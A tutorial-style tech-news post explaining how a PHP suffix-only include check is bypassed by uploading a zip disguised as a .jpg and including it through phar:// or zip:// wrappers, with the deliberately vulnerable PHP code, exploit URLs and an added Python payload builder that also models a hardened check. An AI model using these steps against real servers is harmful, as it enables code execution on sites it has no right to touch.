File inclusion vulnerability: bypassing a whitelist check on the file-type suffix

2025-01-19 Update From: SLTechnology News&Howtos


Shulou(Shulou.com)06/01 Report--

Scenario: $include_file is attacker-controlled and the attacker can upload files. The upload filter only allows the suffixes jpg, gif and png, while the include only accepts paths whose suffix is .php.

allow_url_include=Off (so remote inclusion is not an option)

The vulnerable check (note that it only looks at the last four characters of the string, not at what the path actually points to):

```php
if (isset($include_file) && strtolower(substr($include_file, -4)) == ".php") {
    include_once($include_file);
}
```

Solution

Requires PHP >= 5.3

Package the PHP file into a zip archive and upload it under a whitelisted suffix, for example info.zip.jpg. The upload filter sees a .jpg, but the content is still a valid zip archive.

The archive is then included through the phar stream wrapper: info.zip.jpg is the name of the uploaded archive and info.php is the name of the file inside it. The resulting path ends in .php, so the suffix check passes, and PHP executes the file from inside the archive.

http://localhost/index.php?a=phar://info.zip.jpg/info.php

Test code:

```php
<?php
// Show whether remote inclusion is disabled; the bypass works even when it is Off.
echo "ini_get(allow_url_include): " . ini_get("allow_url_include") . "\n";

$include_file = $_GET['a'];
// Suffix-only whitelist: a phar:// or zip:// path ending in .php satisfies it.
if (isset($include_file) && strtolower(substr($include_file, -4)) == ".php") {
    include_once($include_file);
} else {
    echo "file err";
}
```

Reference document: http://php.net/manual/zh/phar.using.stream.php

PS.

According to the official PHP documentation, PHP 5.3 or later is required; before 5.3 the phar extension had to be installed separately.

If that does not work, try the zip stream wrapper instead (requires the zip extension). Note that the pound sign has to be escaped: in a URL a bare # starts the fragment and is never sent to the server, so it must be encoded as %23:

zip://info.zip.jpg#info.php

http://localhost/index.php?a=zip://info.zip.jpg%23info.php
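The following script is an added example, not code from the original post. It builds the info.zip.jpg payload for both the phar:// step above and the zip:// alternative, shows that a port of the page's suffix check accepts both wrapper paths, encodes the zip:// URL correctly, and contrasts the check with a stricter policy that rejects stream wrappers and traversal. The file contents, the hypothetical allowed directory /var/www/includes and the helper names are assumptions for illustration.

```python
"""Payload builder and check comparison for the phar:// / zip:// suffix bypass.

Added example; not the original article's code. Assumes a hypothetical
include directory /var/www/includes for the hardened policy.
"""
import io
import os
import urllib.parse
import zipfile

# Constructed sample content for the file inside the archive (not from the page).
INNER_NAME = "info.php"
INNER_PHP = b"<?php echo 'included from inside the archive';\n"
UPLOADED_NAME = "info.zip.jpg"  # whitelisted suffix, zip content


def build_payload(inner_name: str = INNER_NAME, inner_php: bytes = INNER_PHP) -> bytes:
    """Return the bytes of a zip archive holding one PHP file.

    Saved as info.zip.jpg it passes a suffix-based upload filter; the content
    is still a zip archive (magic bytes 'PK'), which phar:// and zip:// can open.
    """
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(inner_name, inner_php)
    return buf.getvalue()


def list_payload(payload: bytes) -> list:
    """Names of the members inside a built payload (sanity check)."""
    with zipfile.ZipFile(io.BytesIO(payload)) as zf:
        return zf.namelist()


def passes_suffix_check(include_file: str) -> bool:
    """Port of the page's check: strtolower(substr($include_file, -4)) == '.php'."""
    return include_file[-4:].lower() == ".php"


def wrapper_paths(uploaded_name: str = UPLOADED_NAME, inner_name: str = INNER_NAME) -> dict:
    """Both wrapper forms from the article; each ends in .php, so the check passes."""
    return {
        "phar": f"phar://{uploaded_name}/{inner_name}",
        "zip": f"zip://{uploaded_name}#{inner_name}",
    }


def as_url(base: str, param: str, value: str) -> str:
    """Build the request URL. ':' and '/' are kept readable; '#' becomes %23,
    because an unescaped '#' would be treated as a fragment and never sent."""
    return f"{base}?{param}={urllib.parse.quote(value, safe=':/')}"


def hardened_check(include_file: str, allowed_dir: str = "/var/www/includes") -> bool:
    """Model of a stricter policy (assumed here, not taken from the page):
    refuse stream wrappers and NUL bytes, resolve the path, and require it to
    stay under a fixed directory and still end in .php."""
    if "://" in include_file or "\x00" in include_file:
        return False
    allowed_dir = os.path.normpath(allowed_dir)
    resolved = os.path.normpath(os.path.join(allowed_dir, include_file))
    return resolved.startswith(allowed_dir + os.sep) and resolved.endswith(".php")


if __name__ == "__main__":
    payload = build_payload()
    print(f"{UPLOADED_NAME}: {len(payload)} bytes, members={list_payload(payload)}")
    for kind, path in wrapper_paths().items():
        print(f"{kind:4} {as_url('http://localhost/index.php', 'a', path)}")
        print(f"     suffix check: {passes_suffix_check(path)}  hardened: {hardened_check(path)}")
```

The hardened model is deliberately a model: in PHP the equivalent is to resolve with realpath(), compare against the intended directory, and, better still, map a short key from the request to a fixed list of files rather than passing user input to include at all.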
